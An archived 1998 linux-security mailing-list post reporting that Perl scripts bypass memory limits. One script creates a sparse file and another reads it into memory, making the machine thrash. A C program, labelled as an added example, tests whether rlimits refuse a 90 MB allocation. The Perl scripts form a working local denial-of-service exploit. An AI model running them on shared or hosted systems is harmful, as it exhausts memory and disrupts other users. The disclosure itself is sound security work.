[2091] in linux-security and linux-alert archive
[linux-security] simple perl script bypasses limits
daemon@ATHENA.MIT.EDU (David Lai)
Tue Nov 24 03:41:13 1998
From: dlai@bacon.esd.sgi.com (David Lai)
To: linux-security@redhat.com
Date: Sat, 21 Nov 1998 13:18:31 -0800 (PST)
Resent-From: linux-security@redhat.com
Resent-Reply-To: linux-security@redhat.com
Any user with shell access, or with access to upload a CGI
script, can exploit this to make the machine thrash badly.
Seems to circumvent any limits in the kernel.

Here are my settings:
dlai@whale.home.org:/home/dlai?limit
cputime unlimited
filesize 20000 kbytes
datasize 8192 kbytes
stacksize 8192 kbytes
coredumpsize 1000000 kbytes
memoryuse 8192 kbytes
descriptors 1024
memorylocked 8192 kbytes
maxproc 256
Create a file with a huge hole (can be 4Gb if needed):
[mod: 2Gb on linux. :-( -- REW]
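#!/usr/bin/perl
# Create the file, then reopen it for read/write.
system("touch xxx");
open(XXX,"+<xxx");
# Seek to offset 90,000,000 and write a few bytes, leaving a hole before them.
seek(XXX,90000000,0);
print XXX "A B C\n";
# Extend the file to 4294967295 bytes; the added range is a hole as well.
truncate(XXX, 4294967295);
close(XXX);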
This one creates a file of size 90Megs, but it's really sparse.
"limit filesize" has no effect, this operation succeeds. Understandable
since the file really only occupies a few blocks on the disk.
Next, create a script that reads the file:
#!/usr/bin/perl
open(XXX,"<xxx");
# Read every line of the file into an array, holding the whole file in memory.
@abc=<XXX>;
print "read\n";
exit;
Run it, it will circumvent any limit settings on datasize, stacksize,
memoryuse, memorylocked. It really allocates 90Mb and uses it even
though my limits are set at 8Mb.
ps shows:
6460 dlai 12 0 53608 8156 72 D 0 34.2 43.4 1:14 readx.pl
(I killed it before it ate all my swap - machine was thrashing badly at
this point).
And another note: on IRIX, the [create file] script fails to run; the kernel
detects that the limit for filesize is exceeded:
? x.pl
File size limit exceeded (core dumped)
[mod: Postscriptum in separate message merged by
moderator.... Verified on a 2.0 system -- REW]
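
The check an administrator would want after reading the report above, as an added example that is not part of the original post: it asks whether a given rlimit on the local kernel refuses a 90 MB anonymous mapping when capped at the post's 8192 kbytes. RLIMIT_AS (the address-space limit) is not mentioned in the post and is included here as an assumption about what to test; mapping_allowed and NO_LIMIT are hypothetical names, and the post does not say which allocation path Perl used.

```c
/* Added example: does a given rlimit stop a 90 MB anonymous mapping here? */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1   /* for MAP_ANONYMOUS under strict -std modes */
#endif
#include <stdio.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define NO_LIMIT (-1)   /* hypothetical sentinel: leave all limits untouched */

/* Fork a child, cap `resource` at `cap` bytes, then request `want` bytes.
 * Returns 1 if the kernel granted the mapping, 0 if it refused, -1 on error.
 * The pages are never touched, so no memory is actually consumed. */
int mapping_allowed(int resource, rlim_t cap, size_t want)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (resource != NO_LIMIT) {
            struct rlimit rl = { cap, cap };
            if (setrlimit(resource, &rl) != 0) _exit(2);
        }
        void *p = mmap(NULL, want, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        _exit(p == MAP_FAILED ? 1 : 0);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    if (WEXITSTATUS(status) == 2) return -1;   /* setrlimit itself failed */
    return WEXITSTATUS(status) == 0;
}

int main(void)
{
    const rlim_t cap = 8192UL * 1024;        /* the post's 8192 kbytes */
    const size_t want = 90UL * 1000 * 1000;  /* the post's 90 MB */
    struct { const char *name; int res; } t[] = {
        { "no limit", NO_LIMIT },     { "RLIMIT_DATA", RLIMIT_DATA },
        { "RLIMIT_RSS", RLIMIT_RSS }, { "RLIMIT_AS", RLIMIT_AS },
    };
    for (size_t i = 0; i < sizeof t / sizeof t[0]; i++)
        printf("%-12s -> %s\n", t[i].name,
               mapping_allowed(t[i].res, cap, want) == 1 ? "granted" : "refused");
    return 0;
}
```

A limit that prints "granted" does not constrain this allocation path on the kernel under test, so it cannot be relied on to contain a process like the reader script.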